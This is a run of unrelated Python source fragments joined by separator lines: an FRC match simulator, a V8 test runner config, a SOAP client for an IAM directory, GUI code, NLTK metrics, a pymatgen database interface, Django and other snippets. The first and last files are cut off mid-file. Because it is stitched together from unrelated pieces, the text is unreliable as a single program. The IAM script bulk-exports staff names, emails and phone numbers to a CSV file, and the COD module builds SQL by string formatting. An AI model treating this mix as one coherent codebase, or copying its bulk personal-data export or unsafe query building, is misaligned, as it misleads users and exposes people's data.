obj.event = ndb.Key(Event, '2016nytr')
def _update_rankings(self):
"""
Generates and saves fake rankings
"""
event = Event.get_by_id('2016nytr')
team_wins = defaultdict(int)
team_losses = defaultdict(int)
team_ties = defaultdict(int)
teams = set()
for match in event.matches:
if match.comp_level == 'qm':
for alliance in ['red', 'blue']:
for team in match.alliances[alliance]['teams']:
teams.add(team)
if match.has_been_played:
if alliance == match.winning_alliance:
team_wins[team] += 1
elif match.winning_alliance == '':
team_ties[team] += 1
else:
team_losses[team] += 1
rankings = []
for team in sorted(teams):
wins = team_wins[team]
losses = team_losses[team]
ties = team_ties[team]
rankings.append({
'team_key': team,
'record': {
'wins': wins,
'losses': losses,
'ties': ties,
},
'matches_played': wins + losses + ties,
'dq': 0,
'sort_orders': [2 * wins + ties, 0, 0, 0, 0],
'qual_average': None,
})
rankings = sorted(rankings, key=lambda r: -r['sort_orders'][0])
for i, ranking in enumerate(rankings):
ranking['rank'] = i + 1
EventDetailsManipulator.createOrUpdate(EventDetails(
id='2016nytr',
rankings2=rankings,
))
def step(self):
event = Event.get_by_id('2016nytr')
if self._step == 0: # Qual match schedule added
for match in copy.deepcopy(self._all_matches['qm']):
for alliance in ['red', 'blue']:
match.alliances[alliance]['score'] = -1
match.alliances_json = json.dumps(match.alliances)
match.score_breakdown_json = None
match.actual_time = None
MatchManipulator.createOrUpdate(match)
self._step += 1
elif self._step == 1: # After each qual match
MatchManipulator.createOrUpdate(self._played_matches['qm'][self._substep])
if self._substep < len(self._played_matches['qm']) - 1:
self._substep += 1
else:
self._step += 1
self._substep = 0
EventDetailsManipulator.createOrUpdate(EventDetails(id='2016nytr'))
elif self._step == 2: # After alliance selections
EventDetailsManipulator.createOrUpdate(EventDetails(
id='2016nytr',
alliance_selections=self._alliance_selections_without_backup
))
self._step += 1
elif self._step == 3: # QF schedule added
for match in copy.deepcopy(self._all_matches['qf']):
for alliance in ['red', 'blue']:
match.alliances[alliance]['score'] = -1
match.alliances_json = json.dumps(match.alliances)
match.score_breakdown_json = None
match.actual_time = None
MatchManipulator.createOrUpdate(match)
self._step += 1
elif self._step == 4: # After each QF match
new_match = MatchHelper.play_order_sort_matches(self._played_matches['qf'])[self._substep]
MatchManipulator.createOrUpdate(new_match)
if not self._batch_advance:
win_counts = {
'red': 0,
'blue': 0,
}
for i in xrange(new_match.match_number):
win_counts[Match.get_by_id(
Match.renderKeyName(
new_match.event.id(),
new_match.comp_level,
new_match.set_number,
i+1)).winning_alliance] += 1
for alliance, wins in win_counts.items():
if wins == 2:
s = new_match.set_number
if s in {1, 2}:
self._advancement_alliances['sf1']['red' if s == 1 else 'blue'] = new_match.alliances[alliance]['teams']
elif s in {3, 4}:
self._advancement_alliances['sf2']['red' if s == 3 else 'blue'] = new_match.alliances[alliance]['teams']
else:
raise Exception("Invalid set number: {}".format(s))
for match_set, alliances in self._advancement_alliances.items():
if match_set.startswith('sf'):
for i in xrange(3):
for match in copy.deepcopy(self._all_matches['sf']):
key = '2016nytr_{}m{}'.format(match_set, i+1)
if match.key.id() == key:
for color in ['red', 'blue']:
match.alliances[color]['score'] = -1
match.alliances[color]['teams'] = alliances.get(color, [])
match.alliances_json = json.dumps(match.alliances)
match.score_breakdown_json = None
match.actual_time = None
MatchManipulator.createOrUpdate(match)
if self._substep < len(self._played_matches['qf']) - 1:
self._substep += 1
else:
self._step += 1 if self._batch_advance else 2
self._substep = 0
elif self._step == 5: # SF schedule added
if self._batch_advance:
for match in copy.deepcopy(self._all_matches['sf']):
for alliance in ['red', 'blue']:
match.alliances[alliance]['score'] = -1
match.alliances_json = json.dumps(match.alliances)
match.score_breakdown_json = None
match.actual_time = None
MatchManipulator.createOrUpdate(match)
self._step += 1
elif self._step == 6: # After each SF match
new_match = MatchHelper.play_order_sort_matches(self._played_matches['sf'])[self._substep]
MatchManipulator.createOrUpdate(new_match)
if not self._batch_advance:
win_counts = {
'red': 0,
'blue': 0,
}
for i in xrange(new_match.match_number):
win_counts[Match.get_by_id(
Match.renderKeyName(
new_match.event.id(),
new_match.comp_level,
new_match.set_number,
i+1)).winning_alliance] += 1
for alliance, wins in win_counts.items():
if wins == 2:
self._advancement_alliances['f1']['red' if new_match.set_number == 1 else 'blue'] = new_match.alliances[alliance]['teams']
for match_set, alliances in self._advancement_alliances.items():
if match_set.startswith('f'):
for i in xrange(3):
for match in copy.deepcopy(self._all_matches['f']):
key = '2016nytr_{}m{}'.format(match_set, i+1)
if match.key.id() == key:
for color in ['red', 'blue']:
match.alliances[color]['score'] = -1
match.alliances[color]['teams'] = alliances.get(color, [])
match.alliances_json = json.dumps(match.alliances)
match.score_breakdown_json = None
match.actual_time = None
MatchManipulator.createOrUpdate(match)
# Backup robot introduced
if self._substep == 3:
EventDetailsManipulator.createOrUpdate(EventDetails(
id='2016nytr',
alliance_selections=self._event_details.alliance_selections
))
if self._substep < len(self._played_matches['sf']) - 1:
self._substep += 1
else:
self._step += 1 if self._batch_advance else 2
self._substep = 0
elif self._step == 7: # F schedule added
if self._batch_advance:
for match in copy.deepcopy(self._all_matches['f']):
for alliance in ['red', 'blue']:
match.alliances[alliance]['score'] = -1
match.alliances_json = json.dumps(match.alliances)
match.score_breakdown_json = None
match.actual_time = None
MatchManipulator.createOrUpdate(match)
self._step += 1
elif self._step == 8: # After each F match
MatchManipulator.createOrUpdate(
MatchHelper.play_order_sort_matches(
self._played_matches['f'])[self._substep])
if self._substep < len(self._played_matches['f']) - 1:
self._substep += 1
else:
self._step += 1
self._substep = 0
ndb.get_context().clear_cache()
# Re fetch event matches
event = Event.get_by_id('2016nytr')
MatchHelper.deleteInvalidMatches(event.matches)
ndb.get_context().clear_cache()
self._update_rankings()
|
import test
import os
from os.path import join, exists
TEST_262_HARNESS = ['sta.js']
class Test262TestCase(test.TestCase):
def __init__(self, filename, path, context, root, mode, framework):
super(Test262TestCase, self).__init__(context, path, mode)
self.filename = filename
self.framework = framework
self.root = root
def IsNegative(self):
return '@negative' in self.GetSource()
def GetLabel(self):
return "%s test262 %s" % (self.mode, self.GetName())
def IsFailureOutput(self, output):
if output.exit_code != 0:
return True
return 'FAILED!' in output.stdout
def GetCommand(self):
result = self.context.GetVmCommand(self, self.mode)
result += self.framework
result.append(self.filename)
return result
def GetName(self):
return self.path[-1]
def GetSource(self):
return open(self.filename).read()
class Test262TestConfiguration(test.TestConfiguration):
def __init__(self, context, root):
super(Test262TestConfiguration, self).__init__(context, root)
def ListTests(self, current_path, path, mode, variant_flags):
testroot = join(self.root, 'data', 'test', 'suite')
harness = [join(self.root, 'data', 'test', 'harness', f)
for f in TEST_262_HARNESS]
harness += [join(self.root, 'harness-adapt.js')]
tests = []
for root, dirs, files in os.walk(testroot):
for dotted in [x for x in dirs if x.startswith('.')]:
dirs.remove(dotted)
dirs.sort()
root_path = root[len(self.root):].split(os.path.sep)
root_path = current_path + [x for x in root_path if x]
files.sort()
for file in files:
if file.endswith('.js'):
test_path = ['test262', file[:-3]]
if self.Contains(path, test_path):
test = Test262TestCase(join(root, file), test_path, self.context,
self.root, mode, harness)
tests.append(test)
return tests
def GetBuildRequirements(self):
return ['d8']
def GetTestStatus(self, sections, defs):
status_file = join(self.root, 'test262.status')
if exists(status_file):
test.ReadConfigurationInto(status_file, sections, defs)
def GetConfiguration(context, root):
return Test262TestConfiguration(context, root)
|
"""
IAMService
"""
import time
import xml.sax.saxutils as saxutils
import sys, httplib
from lxml import etree
from cStringIO import StringIO
import toml
class IAMClient(object):
def __init__(self):
conf_fn = "config.toml"
with open(conf_fn) as conf_fh:
self.conf = toml.loads(conf_fh.read())
print(self.conf)
def searchAll(self, startPage, pageSize ):
#config = static.ERP_CONFIG #'SL 8.0'
query = {"username":self.conf["Admin"],"password":self.conf["Admin_Password"], "nonce":self.conf["Nonce"], "startPage":startPage, "pageSize": pageSize}
SM_TEMPLATE = r"""<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:sear="http://search.service.iam.foton.com/">
<soapenv:Header>
<wsse:Security soapenv:mustUnderstand="1" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<wsse:UsernameToken wsu:Id="UsernameToken-1" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
<wsse:Username>%(username)s</wsse:Username>
<wsse:Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%(password)s</wsse:Password>
<wsse:Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">%(nonce)s</wsse:Nonce>
<wsu:Created>2012-07-06T01:49:02.953Z</wsu:Created>
</wsse:UsernameToken>
</wsse:Security>
</soapenv:Header>
<soapenv:Body>
<sear:searchAll>
<arg0>%(startPage)s</arg0>
<arg1>%(pageSize)s</arg1>
<!--Optional:-->
<arg2>ou</arg2>
<arg3>true</arg3>
</sear:searchAll>
</soapenv:Body>
</soapenv:Envelope>""" % query
SoapMessage = SM_TEMPLATE
#print SoapMessage
#construct and send the header
host =self.conf["HOST"]
print(host)
webservice = httplib.HTTP(host)
service = self.conf["Service2"]
url = "/IAMService/services/soap/%s" %(service)
webservice.putrequest("POST", url)
webservice.putheader("Host", host)
webservice.putheader("User-Agent", "Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.2;+SV1;+.NET+CLR+1.1.4322)")
webservice.putheader("Content-type", "text/xml; charset=\"UTF-8\"")
webservice.putheader("Accept-Language", "en-us")
webservice.putheader("Content-length", "%d" % len(SoapMessage))
#webservice.putheader("SOAPAction", "authenticate")
webservice.endheaders()
webservice.send(SoapMessage)
# get the response
statuscode, statusmessage, header = webservice.getreply()
print "Response: ", statuscode, statusmessage, startPage
#print "headers: ", header
#print dir(webservice)
res = webservice.getfile().read()
fn = "%d.xml" %(time.time())
#print res
#with open(fn, 'w') as fh:
# fh.write(res)
return res #self.parseSessionToken(res)
def getResponse(self, xmlstr):
string_file = StringIO(xmlstr.replace('soap:',''))
#root = etree.fromstring(xml)
tree = etree.parse(string_file)
resp = None
for element in tree.xpath('/Envelope/Body'):
resp = element[0][1].text
return resp
def getResult(self, xmlstr):
resp = self.getResponse(xmlstr)
string_file = StringIO(resp)
#root = etree.fromstring(xml)
tree = etree.parse(string_file)
result = None
v = tree.xpath('/Parameters')[0]
l = len(v)
result = v[l-1].text
if result.count('successful') >0:
return "S"
else:
return "F"
def get_element_text(element, node):
v = element.xpath(node)
if len(v)>0:
#print v[0].text.encode("utf8")
return v[0].text.encode("utf8")
else:
return ""
def main():
cm = IAMClient()
fh = open("id3.csv","w")
for i in range(1, 20):
xmlstr = cm.searchAll(i,10)
string_file = StringIO(xmlstr.replace('soap:','').replace("ns2:",""))
#root = etree.fromstring(xml)
tree = etree.parse(string_file)
resp = None
for element in tree.xpath('/Envelope/Body/searchAllResponse/return/userData'):
#resp = element[0][1].text
#print "\n"
v1 = get_element_text(element, "cn")
v2 = get_element_text(element, "mail")
v3 = get_element_text(element, "fotonAppAtt37")
v4 = get_element_text(element, "mobile")
v5 = get_element_text(element, "telephoneNumber")
v6 = get_element_text(element, "uid")
v7 = get_element_text(element, "ou")
#print userPassword[0].text,
x = "%s,%s,%s,%s,%s,%s,%s\n" % (v1, v2, v3, v4, v5, v6, v7)
fh.write(x)
time.sleep(0.5)
fh.close()
"""
token = cm.parseSessionToken(xmlstr)
rtn = cm.callMethod(token, "")
print cm.getResult(rtn)
"""
if __name__ == '__main__':
main()
|
from __future__ import print_function
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(427, 220)
self.verticalLayout = QtGui.QVBoxLayout(Form)
self.verticalLayout.setSpacing(0)
self.verticalLayout.setMargin(0)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.groupBox = GroupBox(Form)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.groupBox.setFont(font)
self.groupBox.setCheckable(False)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.gridLayout = QtGui.QGridLayout(self.groupBox)
self.gridLayout.setSpacing(0)
self.gridLayout.setContentsMargins(5, 0, 0, 0)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.recordCheck = QtGui.QCheckBox(self.groupBox)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.recordCheck.setFont(font)
self.recordCheck.setChecked(True)
self.recordCheck.setObjectName(_fromUtf8("recordCheck"))
self.gridLayout.addWidget(self.recordCheck, 0, 0, 1, 1)
self.displayCheck = QtGui.QCheckBox(self.groupBox)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.displayCheck.setFont(font)
self.displayCheck.setChecked(True)
self.displayCheck.setObjectName(_fromUtf8("displayCheck"))
self.gridLayout.addWidget(self.displayCheck, 0, 1, 1, 1)
self.recordInitCheck = QtGui.QCheckBox(self.groupBox)
font = QtGui.QFont()
font.setBold(False)
font.setWeight(50)
self.recordInitCheck.setFont(font)
self.recordInitCheck.setObjectName(_fromUtf8("recordInitCheck"))
self.gridLayout.addWidget(self.recordInitCheck, 1, 0, 1, 2)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.gridLayout.addItem(spacerItem, 2, 0, 1, 1)
self.verticalLayout.addWidget(self.groupBox)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Form", None))
self.groupBox.setTitle(_translate("Form", "GroupBox", None))
self.recordCheck.setText(_translate("Form", "Record Trace", None))
self.displayCheck.setText(_translate("Form", "Display", None))
self.recordInitCheck.setText(_translate("Form", "Record Initial State", None))
from acq4.pyqtgraph import GroupBox
|
from __future__ import print_function, unicode_literals
from nltk.probability import FreqDist
from nltk.compat import python_2_unicode_compatible
@python_2_unicode_compatible
class ConfusionMatrix(object):
"""
The confusion matrix between a list of reference values and a
corresponding list of test values. Entry *[r,t]* of this
matrix is a count of the number of times that the reference value
*r* corresponds to the test value *t*. E.g.:
>>> from nltk.metrics import ConfusionMatrix
>>> ref = 'DET NN VB DET JJ NN NN IN DET NN'.split()
>>> test = 'DET VB VB DET NN NN NN IN DET NN'.split()
>>> cm = ConfusionMatrix(ref, test)
>>> print(cm['NN', 'NN'])
3
Note that the diagonal entries *Ri=Tj* of this matrix
corresponds to correct values; and the off-diagonal entries
correspond to incorrect values.
"""
def __init__(self, reference, test, sort_by_count=False):
"""
Construct a new confusion matrix from a list of reference
values and a corresponding list of test values.
:type reference: list
:param reference: An ordered list of reference values.
:type test: list
:param test: A list of values to compare against the
corresponding reference values.
:raise ValueError: If ``reference`` and ``length`` do not have
the same length.
"""
if len(reference) != len(test):
raise ValueError('Lists must have the same length.')
# Get a list of all values.
if sort_by_count:
ref_fdist = FreqDist(reference)
test_fdist = FreqDist(test)
def key(v): return -(ref_fdist[v]+test_fdist[v])
values = sorted(set(reference+test), key=key)
else:
values = sorted(set(reference+test))
# Construct a value->index dictionary
indices = dict((val,i) for (i,val) in enumerate(values))
# Make a confusion matrix table.
confusion = [[0 for val in values] for val in values]
max_conf = 0 # Maximum confusion
for w,g in zip(reference, test):
confusion[indices[w]][indices[g]] += 1
max_conf = max(max_conf, confusion[indices[w]][indices[g]])
#: A list of all values in ``reference`` or ``test``.
self._values = values
#: A dictionary mapping values in ``self._values`` to their indices.
self._indices = indices
#: The confusion matrix itself (as a list of lists of counts).
self._confusion = confusion
#: The greatest count in ``self._confusion`` (used for printing).
self._max_conf = max_conf
#: The total number of values in the confusion matrix.
self._total = len(reference)
#: The number of correct (on-diagonal) values in the matrix.
self._correct = sum(confusion[i][i] for i in range(len(values)))
def __getitem__(self, li_lj_tuple):
"""
:return: The number of times that value ``li`` was expected and
value ``lj`` was given.
:rtype: int
"""
(li, lj) = li_lj_tuple
i = self._indices[li]
j = self._indices[lj]
return self._confusion[i][j]
def __repr__(self):
return '<ConfusionMatrix: %s/%s correct>' % (self._correct,
self._total)
def __str__(self):
return self.pretty_format()
def pretty_format(self, show_percents=False, values_in_chart=True,
truncate=None, sort_by_count=False):
"""
:return: A multi-line string representation of this confusion matrix.
:type truncate: int
:param truncate: If specified, then only show the specified
number of values. Any sorting (e.g., sort_by_count)
will be performed before truncation.
:param sort_by_count: If true, then sort by the count of each
label in the reference data. I.e., labels that occur more
frequently in the reference label will be towards the left
edge of the matrix, and labels that occur less frequently
will be towards the right edge.
@todo: add marginals?
"""
confusion = self._confusion
values = self._values
if sort_by_count:
values = sorted(values, key=lambda v:
-sum(self._confusion[self._indices[v]]))
if truncate:
values = values[:truncate]
if values_in_chart:
value_strings = ["%s" % val for val in values]
else:
value_strings = [str(n+1) for n in range(len(values))]
# Construct a format string for row values
valuelen = max(len(val) for val in value_strings)
value_format = '%' + repr(valuelen) + 's | '
# Construct a format string for matrix entries
if show_percents:
entrylen = 6
entry_format = '%5.1f%%'
zerostr = ' .'
else:
entrylen = len(repr(self._max_conf))
entry_format = '%' + repr(entrylen) + 'd'
zerostr = ' '*(entrylen-1) + '.'
# Write the column values.
s = ''
for i in range(valuelen):
s += (' '*valuelen)+' |'
for val in value_strings:
if i >= valuelen-len(val):
s += val[i-valuelen+len(val)].rjust(entrylen+1)
else:
s += ' '*(entrylen+1)
s += ' |\n'
# Write a dividing line
s += '%s-+-%s+\n' % ('-'*valuelen, '-'*((entrylen+1)*len(values)))
# Write the entries.
for val, li in zip(value_strings, values):
i = self._indices[li]
s += value_format % val
for lj in values:
j = self._indices[lj]
if confusion[i][j] == 0:
s += zerostr
elif show_percents:
s += entry_format % (100.0*confusion[i][j]/self._total)
else:
s += entry_format % confusion[i][j]
if i == j:
prevspace = s.rfind(' ')
s = s[:prevspace] + '<' + s[prevspace+1:] + '>'
else: s += ' '
s += '|\n'
# Write a dividing line
s += '%s-+-%s+\n' % ('-'*valuelen, '-'*((entrylen+1)*len(values)))
# Write a key
s += '(row = reference; col = test)\n'
if not values_in_chart:
s += 'Value key:\n'
for i, value in enumerate(values):
s += '%6d: %s\n' % (i+1, value)
return s
def key(self):
values = self._values
str = 'Value key:\n'
indexlen = len(repr(len(values)-1))
key_format = ' %'+repr(indexlen)+'d: %s\n'
for i in range(len(values)):
str += key_format % (i, values[i])
return str
def demo():
reference = 'DET NN VB DET JJ NN NN IN DET NN'.split()
test = 'DET VB VB DET NN NN NN IN DET NN'.split()
print('Reference =', reference)
print('Test =', test)
print('Confusion matrix:')
print(ConfusionMatrix(reference, test))
print(ConfusionMatrix(reference, test).pretty_format(sort_by_count=True))
if __name__ == '__main__':
demo()
|
__author__ = "Jon Dawson"
__copyright__ = "Copyright (C) 2012, Jonathan P Dawson"
__version__ = "0.1"
class Allocator:
"""Maintain a pool of registers, variables and arrays. Keep track of what they are used for."""
def __init__(self, reuse):
self.registers = []
self.all_registers = {}
self.memory_size_2 = 0
self.memory_size_4 = 0
self.reuse = reuse
self.memory_content_2 = {}
self.memory_content_4 = {}
def new_array(self, size, contents, element_size):
if element_size == 2:
reg = self.memory_size_2
self.memory_size_2 += int(size)
if contents is not None:
for location, value in enumerate(contents, reg):
self.memory_content_2[location] = value
return reg
elif element_size == 4:
reg = self.memory_size_4
self.memory_size_4 += int(size)
if contents is not None:
for location, value in enumerate(contents, reg):
self.memory_content_4[location] = value
return reg
def regsize(self, reg):
return self.all_registers[reg][1]
def new(self, size, name="temporary_register"):
assert type(size) == int
reg = 0
while reg in self.registers or (reg in self.all_registers and self.regsize(reg) != size):
reg += 1
self.registers.append(reg)
self.all_registers[reg] = (name, size)
return reg
def free(self, register):
if register in self.registers and self.reuse:
self.registers.remove(register)
|
from tkinter.scrolledtext import ScrolledText
import tkinter as tk
from trace_json import traceparse
from parsley_json import jsonGrammar
jsonData = open('337141-steamcube.json').read()
class Tracer(object):
def __init__(self, grammarWin, inputWin, logWin, trace):
self.grammarWin = grammarWin
self.inputWin = inputWin
self.logWin = logWin
self.trace = trace
self.position = 0
def advance(self):
if self.position < len(self.trace):
self.position += 1
self.display()
def rewind(self):
if self.position > 0:
self.position -= 1
self.display()
def display(self):
def updateHighlight(w, start, end=None):
w.tag_remove("highlight", "1.0", tk.END)
start = "1.0+%sc" % (start,)
if end is not None:
end = "1.0+%sc" % (end,)
w.tag_add("highlight", start, end)
w.tag_configure("highlight", background="yellow")
_, (grammarStart, grammarEnd), inputPos = self.trace[self.position]
updateHighlight(self.grammarWin, grammarStart, grammarEnd)
updateHighlight(self.inputWin, inputPos)
def display(grammar, src, trace):
r = tk.Tk()
f = tk.Frame(master=r)
lt = ScrolledText(master=f)
rt = ScrolledText(master=f)
lt.pack(side="left", expand=True, fill="both")
rt.pack(side="right", expand=True, fill="both")
bot = ScrolledText(master=r, height=5)
tracer = Tracer(lt, rt, bot, trace)
toolbar = tk.Frame(master=r)
tk.Button(toolbar, text="Next", width=5, command=tracer.advance).pack(
side="left")
tk.Button(toolbar, text="Prev", width=5, command=tracer.rewind).pack(
side="left")
f.pack(expand=1, fill="both")
toolbar.pack(fill=tk.X)
bot.pack(fill=tk.X)
lt.insert(tk.END, grammar)
rt.insert(tk.END, src)
tracer.display()
return r
_, trace = traceparse(jsonData)
root = display(jsonGrammar, jsonData, trace)
root.mainloop()
|
from sys import argv,exit
from os import getuid
from PyQt4.QtGui import QApplication,QIcon
from Core.Privilege import frm_privelege
from Core.Main import Initialize
from Core.check import check_dependencies
from Modules.utils import Refactor
def ExecRootApp():
check_dependencies()
root = QApplication(argv)
app = Initialize()
app.setWindowIcon(QIcon('rsc/icon.ico'))
app.center(),app.show()
exit(root.exec_())
if __name__ == '__main__':
if not getuid() == 0:
app2 = QApplication(argv)
priv = frm_privelege()
priv.setWindowIcon(QIcon('rsc/icon.ico'))
priv.show(),app2.exec_()
exit(Refactor.threadRoot(priv.Editpassword.text()))
ExecRootApp()
|
"""
This module provides classes to interface with the Crystallography Open
Database. If you use data from the COD, please cite the following works (as
stipulated by the COD developers)::
Merkys, A., Vaitkus, A., Butkus, J., Okulič-Kazarinas, M., Kairys, V. &
Gražulis, S. (2016) "COD::CIF::Parser: an error-correcting CIF parser for
the Perl language". Journal of Applied Crystallography 49.
Gražulis, S., Merkys, A., Vaitkus, A. & Okulič-Kazarinas, M. (2015)
"Computing stoichiometric molecular composition from crystal structures".
Journal of Applied Crystallography 48, 85-91.
Gražulis, S., Daškevič, A., Merkys, A., Chateigner, D., Lutterotti, L.,
Quirós, M., Serebryanaya, N. R., Moeck, P., Downs, R. T. & LeBail, A.
(2012) "Crystallography Open Database (COD): an open-access collection of
crystal structures and platform for world-wide collaboration". Nucleic
Acids Research 40, D420-D427.
Grazulis, S., Chateigner, D., Downs, R. T., Yokochi, A. T., Quiros, M.,
Lutterotti, L., Manakova, E., Butkus, J., Moeck, P. & Le Bail, A. (2009)
"Crystallography Open Database – an open-access collection of crystal
structures". J. Appl. Cryst. 42, 726-729.
Downs, R. T. & Hall-Wallace, M. (2003) "The American Mineralogist Crystal
Structure Database". American Mineralogist 88, 247-250.
"""
import requests
import subprocess
from monty.dev import requires
from monty.os.path import which
import re
from pymatgen.core.composition import Composition
from pymatgen.core.structure import Structure
from pymatgen.util.string import formula_double_format
__author__ = "Shyue Ping Ong"
__copyright__ = "Copyright 2012, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
class COD(object):
"""
An interface to the Crystallography Open Database.
"""
def __init__(self):
pass
def query(self, sql):
r = subprocess.check_output(["mysql", "-u", "cod_reader", "-h",
"www.crystallography.net", "-e",
sql, "cod"])
return r.decode("utf-8")
@requires(which("mysql"), "mysql must be installed to use this query.")
def get_cod_ids(self, formula):
"""
Queries the COD for all cod ids associated with a formula. Requires
mysql executable to be in the path.
Args:
formula (str): Formula.
Returns:
List of cod ids.
"""
# TODO: Remove dependency on external mysql call. MySQL-python package does not support Py3!
# Standardize formula to the version used by COD.
sql = 'select file from data where formula="- %s -"' % \
Composition(formula).hill_formula
text = self.query(sql).split("\n")
cod_ids = []
for l in text:
m = re.search(r"(\d+)", l)
if m:
cod_ids.append(int(m.group(1)))
return cod_ids
def get_structure_by_id(self, cod_id, **kwargs):
"""
Queries the COD for a structure by id.
Args:
cod_id (int): COD id.
kwargs: All kwargs supported by
:func:`pymatgen.core.structure.Structure.from_str`.
Returns:
A Structure.
"""
r = requests.get("http://www.crystallography.net/cod/%s.cif" % cod_id)
return Structure.from_str(r.text, fmt="cif", **kwargs)
@requires(which("mysql"), "mysql must be installed to use this query.")
def get_structure_by_formula(self, formula, **kwargs):
"""
Queries the COD for structures by formula. Requires mysql executable to
be in the path.
Args:
cod_id (int): COD id.
kwargs: All kwargs supported by
:func:`pymatgen.core.structure.Structure.from_str`.
Returns:
A list of dict of the format
[{"structure": Structure, "cod_id": cod_id, "sg": "P n m a"}]
"""
structures = []
sql = 'select file, sg from data where formula="- %s -"' % \
Composition(formula).hill_formula
text = self.query(sql).split("\n")
text.pop(0)
for l in text:
if l.strip():
cod_id, sg = l.split("\t")
r = requests.get("http://www.crystallography.net/cod/%s.cif"
% cod_id.strip())
try:
s = Structure.from_str(r.text, fmt="cif", **kwargs)
structures.append({"structure": s, "cod_id": int(cod_id),
"sg": sg})
except Exception:
import warnings
warnings.warn("\nStructure.from_str failed while parsing CIF file:\n%s" % r.text)
raise
return structures
|
"""foo URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/2.0/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.conf import settings
from django.contrib import admin
from django.urls import include
from django.urls import path
urlpatterns = [
path("polls/", include("polls.urls")),
path("admin/", admin.site.urls),
]
if settings.DEBUG:
import debug_toolbar
urlpatterns = [
path("__debug__/", include(debug_toolbar.urls)),
] + urlpatterns
|
from __future__ import unicode_literals
"""
Create a new document with defaults set
"""
import webnotes
from webnotes.utils import nowdate, nowtime, cint, flt
import webnotes.defaults
def get_new_doc(doctype, parent_doc = None, parentfield = None):
doc = webnotes.doc({
"doctype": doctype,
"__islocal": 1,
"owner": webnotes.session.user,
"docstatus": 0
})
meta = webnotes.get_doctype(doctype)
if parent_doc:
doc.parent = parent_doc.name
doc.parenttype = parent_doc.doctype
if parentfield:
doc.parentfield = parentfield
for d in meta.get({"doctype":"DocField", "parent": doctype}):
default = webnotes.defaults.get_user_default(d.fieldname)
if default:
doc.fields[d.fieldname] = default
elif d.fields.get("default"):
if d.default == "__user":
doc.fields[d.fieldname] = webnotes.session.user
elif d.default == "Today":
doc.fields[d.fieldname] = nowdate()
elif d.default.startswith(":"):
ref_fieldname = d.default[1:].lower().replace(" ", "_")
if parent_doc:
ref_docname = parent_doc.fields[ref_fieldname]
else:
ref_docname = webnotes.conn.get_default(ref_fieldname)
doc.fields[d.fieldname] = webnotes.conn.get_value(d.default[1:],
ref_docname, d.fieldname)
else:
doc.fields[d.fieldname] = d.default
# convert type of default
if d.fieldtype in ("Int", "Check"):
doc.fields[d.fieldname] = cint(doc.fields[d.fieldname])
elif d.fieldtype in ("Float", "Currency"):
doc.fields[d.fieldname] = flt(doc.fields[d.fieldname])
elif d.fieldtype == "Time":
doc.fields[d.fieldname] = nowtime()
return doc
|
"""LCM type definitions
This file automatically generated by lcm.
DO NOT MODIFY BY HAND!!!!
"""
try:
import cStringIO.StringIO as BytesIO
except ImportError:
from io import BytesIO
import struct
class vortex_sensor_t(object):
__slots__ = ["sensor1", "sensor2", "velocity"]
def __init__(self):
self.sensor1 = 0.0
self.sensor2 = 0.0
self.velocity = 0.0
def encode(self):
buf = BytesIO()
buf.write(vortex_sensor_t._get_packed_fingerprint())
self._encode_one(buf)
return buf.getvalue()
def _encode_one(self, buf):
buf.write(struct.pack(">ddd", self.sensor1, self.sensor2, self.velocity))
def decode(data):
if hasattr(data, 'read'):
buf = data
else:
buf = BytesIO(data)
if buf.read(8) != vortex_sensor_t._get_packed_fingerprint():
raise ValueError("Decode error")
return vortex_sensor_t._decode_one(buf)
decode = staticmethod(decode)
def _decode_one(buf):
self = vortex_sensor_t()
self.sensor1, self.sensor2, self.velocity = struct.unpack(">ddd", buf.read(24))
return self
_decode_one = staticmethod(_decode_one)
_hash = None
def _get_hash_recursive(parents):
if vortex_sensor_t in parents: return 0
tmphash = (0x3525d46ae32101c3) & 0xffffffffffffffff
tmphash = (((tmphash<<1)&0xffffffffffffffff) + (tmphash>>63)) & 0xffffffffffffffff
return tmphash
_get_hash_recursive = staticmethod(_get_hash_recursive)
_packed_fingerprint = None
def _get_packed_fingerprint():
if vortex_sensor_t._packed_fingerprint is None:
vortex_sensor_t._packed_fingerprint = struct.pack(">Q", vortex_sensor_t._get_hash_recursive([]))
return vortex_sensor_t._packed_fingerprint
_get_packed_fingerprint = staticmethod(_get_packed_fingerprint)
|
import warnings
import unittest
import os
from pymatgen.alchemy.transmuters import CifTransmuter, PoscarTransmuter
